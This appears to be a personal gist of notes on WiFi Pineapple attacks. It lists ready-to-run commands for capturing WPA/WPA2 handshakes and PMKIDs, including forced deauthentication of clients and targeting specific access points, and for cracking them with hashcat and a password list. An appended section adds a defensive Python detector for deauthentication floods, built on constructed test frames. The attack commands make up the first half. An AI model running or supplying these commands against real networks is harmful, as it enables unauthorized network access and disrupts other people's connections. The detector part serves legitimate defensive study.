@hoodoer
Created December 10, 2019 09:37
WiFi Pineapple Attacks
airmon-ng check kill
https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/
On nano, or other wifi access point monitoring:
airmon-ng start wlan1
airodump-ng -w PacketCapture wlan1mon
(Then just sit near the AP you want to crack and wait for someone to connect to it.)
(You could speed this up with a deauth attack as mentioned in the forum thread above.)
Once someone has connected to the network, you might want to make sure the handshake was picked up by the nano, in case you were too far away or something.
To do this, stop airodump (Control + C), then run aircrack-ng PacketCapture-01.cap. It will give you a list of networks. If it shows a handshake beside your target, you're good to go. If not, try again.
You'll need to convert your PacketCapture to a different format using the command
!!!SKIP THIS, USE TOOLS BELOW!!!
aircrack-ng -J Capture.hccap PacketCapture-01.cap
Now go home, take the Capture.hccap file off your pineapple and store it somewhere on your computer.
You'll need to get a large password dictionary.
Now that you have all the information recorded in the Capture file, you'll need to crack it.
!!!THIS HERE!!!!
Ok, get ready for hashcat:
root@kaliboxen:~/tools/hashcat-utils/src# ./cap2hccapx.bin PacketCapture-01.cap output.hccapx
drews-mbp:hashcat drewk$ ./hashcat -m 2500 output.hccapx ~/VM\ Share/PasswordLists/rockyou.txt
************
https://forums.hak5.org/topic/44213-pmkid-attack-on-wifi-pineapples/
https://miloserdov.org/?p=2100
https://www.bitcrack.net/the-pmkid-attack/
Probably works best on the Alfa radio.
PMKID:
Can run this against a wlanXmon device
hcxdumptool -o test.pcapng -i wlan2 --enable_status 3
To go completely passive on the hcxdump, add these flags:
--disable_ap_attacks --disable_deauthentications --disable_client_attacks --disable_active_scan
To target a specific AP (from the awesome bitcrack article above):
We now run HCXDumpTool again, using the filter switches and watch as it attacks our target network, waiting for a PMKID.
The switches are:
--filterlist= To tell the tool which file contains the MAC addresses
--filtermode=2 Tells the tool that these MAC addresses in --filterlist are our targets, ignore anything else:
hcxpcaptool -z test.16800 test.pcapng
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
*********************
General tricks:
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
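The deauth step (aireplay-ng -0 here, and hcxdumptool's default active mode in the PMKID section) is the one part of these captures that transmits, so it is what a wireless IDS looks for on the defender's side. The following is an added example, not code from the gist or from any of the tools above: a small Python detector that parses the fixed 802.11 management header by hand (no scapy needed), counts deauth/disassoc frames per BSSID in a sliding window, and flags broadcast deauths, which real APs almost never send. The frame bytes, MAC addresses, timestamps and the threshold/window values are all constructed test data; on a real capture you would feed it (timestamp, frame) pairs read from a monitor-mode pcap.

```python
# Added example (not from the gist): a WIDS-style detector for the
# deauthentication/disassociation floods used to force WPA handshakes.
# Assumed frame layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2),
# followed, for deauth/disassoc, by a 2-byte little-endian reason code.
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0
BEACON_SUBTYPE = 0x08
DISASSOC_SUBTYPE = 0x0A
DEAUTH_SUBTYPE = 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def _mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def parse_frame(raw: bytes):
    """Return header fields of a management frame, or None for anything else."""
    if len(raw) < 24:
        return None
    fc = raw[0]
    ftype = (fc >> 2) & 0x3        # bits 2-3 of Frame Control: frame type
    subtype = (fc >> 4) & 0xF      # bits 4-7: frame subtype
    if ftype != MGMT_TYPE:
        return None
    frame = {
        "subtype": subtype,
        "dst": _mac(raw[4:10]),     # Addr1: receiver
        "src": _mac(raw[10:16]),    # Addr2: transmitter (spoofed by injection tools)
        "bssid": _mac(raw[16:22]),  # Addr3: BSSID
        "reason": None,
    }
    if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(raw) >= 26:
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return frame


def detect_deauth_flood(frames, window_s=2.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).

    Emits one 'deauth_flood' alert per BSSID when `threshold` deauth/disassoc
    frames arrive within `window_s`, plus a 'broadcast_deauth' alert for each
    deauth addressed to ff:ff:ff:ff:ff:ff.
    """
    recent = defaultdict(deque)    # bssid -> timestamps of recent deauth frames
    alerts = []
    for ts, raw in frames:
        f = parse_frame(raw)
        if f is None or f["subtype"] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        if f["dst"] == BROADCAST:
            alerts.append({"kind": "broadcast_deauth", "bssid": f["bssid"],
                           "reason": f["reason"], "ts": ts})
        q = recent[f["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) == threshold:             # fires once per burst, not per frame
            alerts.append({"kind": "deauth_flood", "bssid": f["bssid"],
                           "count": len(q), "ts": ts})
    return alerts


def build_mgmt_frame(subtype, dst, src, bssid, reason=None) -> bytes:
    """Build a minimal management frame as test input (nothing is transmitted)."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    raw = (fc + b"\x00\x00" + _mac_bytes(dst) + _mac_bytes(src)
           + _mac_bytes(bssid) + b"\x00\x00")
    if reason is not None:
        raw += struct.pack("<H", reason)
    return raw


# Constructed sample capture: locally administered (02:...) MACs, not real devices.
AP_HOME = "02:11:22:33:44:01"
AP_OTHER = "02:11:22:33:44:02"
CLIENT = "02:aa:bb:cc:dd:01"
CLIENT_2 = "02:aa:bb:cc:dd:02"

SAMPLE_FRAMES = [
    (0.0, build_mgmt_frame(BEACON_SUBTYPE, BROADCAST, AP_HOME, AP_HOME)),      # ignored
    (0.5, b"\x08\x00" + b"\x00" * 22),                                         # data frame, ignored
    (1.0, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT_2, AP_OTHER, AP_OTHER, 3)),  # benign single deauth
]
# Burst of eight spoofed deauths against one client within 0.35 s, then one
# broadcast deauth; reason code 7 is a constructed value for the sample.
SAMPLE_FRAMES += [
    (5.0 + 0.05 * i, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP_HOME, AP_HOME, 7))
    for i in range(8)
]
SAMPLE_FRAMES.append((5.4, build_mgmt_frame(DEAUTH_SUBTYPE, BROADCAST, AP_HOME, AP_HOME, 7)))

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(alert)
```

Two caveats worth keeping in mind when reading the alerts: 802.11w (Protected Management Frames) makes clients drop unauthenticated deauth/disassoc frames, which blunts the aireplay-ng step but does nothing against PMKID capture, since that needs no client at all; and the passive hcxdumptool flags listed above stop the tool from transmitting, so a purely passive listener produces nothing over the air for a detector like this to see.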